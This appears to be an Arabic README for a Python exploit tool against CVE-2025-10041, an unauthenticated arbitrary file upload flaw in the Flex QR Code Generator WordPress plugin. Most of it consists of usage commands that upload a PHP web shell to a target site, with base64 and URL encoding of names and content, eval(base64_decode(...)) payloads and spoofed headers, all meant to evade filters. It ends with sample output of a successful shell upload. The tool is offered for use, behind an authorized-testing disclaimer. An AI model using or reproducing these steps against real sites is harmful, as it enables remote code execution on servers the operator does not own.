
Flex QR Code Generator <= 1.2.5 - رفع ملف عشوائي بدون مصادقة
Flex QR Code Generator <= 1.2.5 - رفع ملفات اعتباطي بدون مصادقة
إضافة Flex QR Code Generator لووردبريس معرضة لرفع ملفات اعتباطي بسبب عدم التحقق من نوع الملف في دالة save_qr_code_to_db() في جميع الإصدارات حتى 1.2.5 ضمناً.
يسمح ذلك لـ المهاجمين بدون مصادقة برفع ملفات ضارة على خادم الموقع المستهدف، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
CVE-2025-100419.8 (حرج)CVE-2025-10041.py هو أداة استغلال احترافية مصممة لأتمتة الهجوم من خلال استغلال هذه الثغرة.
توفر ميزات متقدمة لتجاوس الحمايات الشائعة وتقنيات الترميز.
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
لعرض جميع الخيارات المتاحة وتعليمات الاستخدام:
python3 CVE-2025-10041.py --help
.php أو الأسماء المشبوهة؛ الترميز قد يتجاوز الفلاتر.eval(base64_decode(...)) قد يتجاوز فلاتر المحتوى.Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
هذا السكريبت مقدم لأغراض تعليمية وبحثية واختبارات الاختراق المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها ممنوع منعاً باتاً وغير قانوني.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
Nxploited (Khaled Alenazi)